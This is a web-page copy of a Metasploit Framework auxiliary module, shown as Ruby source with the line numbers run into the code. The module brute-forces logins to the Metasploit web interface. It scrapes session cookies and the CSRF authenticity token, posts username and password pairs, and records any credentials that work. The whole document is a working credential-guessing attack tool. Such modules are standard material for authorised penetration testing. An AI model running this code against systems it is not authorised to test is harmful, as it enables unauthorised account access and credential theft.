CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/msf/msf_web_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::AuthBrute910include Msf::Auxiliary::Scanner1112def initialize13super(14'Name' => 'Metasploit Web Interface Login Utility',15'Description' => %{16This module simply attempts to login to a Metasploit17web interface using a specific user/pass.18},19'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],20'License' => MSF_LICENSE,21'DefaultOptions' => { 'SSL' => true }22)2324register_options(25[26Opt::RPORT(3790),27OptString.new('URILOGIN', [true, "URI for Metasploit Web login. Default is /login", "/login"]),28OptString.new('URIGUESS', [true, "URI for Metasploit Web login. Default is /user_sessions", "/user_sessions"]),29OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]),30])3132register_autofilter_ports([55553])33end3435def run_host(ip)36begin37res = send_request_cgi({38'uri' => datastore['URILOGIN'],39'method' => 'GET'40}, 25)41http_fingerprint({ :response => res })42rescue ::Rex::ConnectionError => e43vprint_error("#{datastore['URILOGIN']} - #{e}")44return45end4647if not res48vprint_error(" #{datastore['URILOGIN']} - No response")49return50end51if !(res.code == 200 or res.code == 302)52vprint_error("Expected 200 HTTP code - not msf web? Got: #{res.code}")53return54end55if res.body !~ /<title>Metasploit<\/title>/56vprint_error("Expected metasploit page - not msf web interface? #{res.body}")57return58end5960each_user_pass do |user, pass|61do_login(user, pass)62end63end6465def do_login(user='msf', pass='msf')66vprint_status(" - Trying username:'#{user}' with password:'#{pass}'")67begin68res = send_request_cgi({69'uri' => datastore['URILOGIN'],70'method' => 'GET'71}, 25)7273token = ''74uisession = ''75if res and res.code == 200 and !res.get_cookies.empty?76# extract tokens from cookie77res.get_cookies.split(';').each {|c|78c.split(',').each {|v|79if v.split('=')[0] =~ /token/80token = v.split('=')[1]81elsif v.split('=')[0] =~ /_ui_session/82uisession = v.split('=')[1]83end84}85}86# extract authenticity_token from hidden field87atoken = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*)"/).flatten[0]8889if atoken.nil?90print_error("No auth token found")91return :abort92end93else94print_error("Failed to get login cookies, aborting")95return :abort96end9798res = send_request_cgi(99{100'uri' => datastore['URIGUESS'],101'method' => 'POST',102'cookie' => "token=#{token}; _ui_session=#{uisession}",103'vars_post' =>104{105'commit' => 'Sign in',106'utf8' => "\xE2\x9C\x93",107'authenticity_token' => atoken,108'user_session[username]' => user,109'user_session[password]' => pass110}111}, 25)112113if not res or res.code != 302114vprint_error("FAILED LOGIN. '#{user}' : '#{pass}' with code #{res.code}")115return :skip_pass116end117if res.headers['Location'] =~ /\/login/118vprint_error("FAILED LOGIN. '#{user}' : '#{pass}' with wrong redirect")119return :skip_pass120else121print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")122123report_cred(124ip: datastore['RHOST'],125port: datastore['RPORT'],126service_name: 'msf-web',127user: user,128password: pass,129proof: res.headers['Location']130)131return :next_user132end133rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT134print_error("HTTP Connection Failed, Aborting")135return :abort136end137end138139def report_cred(opts)140service_data = {141address: opts[:ip],142port: opts[:port],143service_name: opts[:service_name],144protocol: 'tcp',145workspace_id: myworkspace_id146}147148credential_data = {149origin_type: :service,150module_fullname: fullname,151username: opts[:user],152private_data: opts[:password],153private_type: :password154}.merge(service_data)155156login_data = {157last_attempted_at: Time.now,158core: create_credential(credential_data),159status: Metasploit::Model::Login::Status::SUCCESSFUL,160proof: opts[:proof]161}.merge(service_data)162163create_credential_login(login_data)164end165end166167168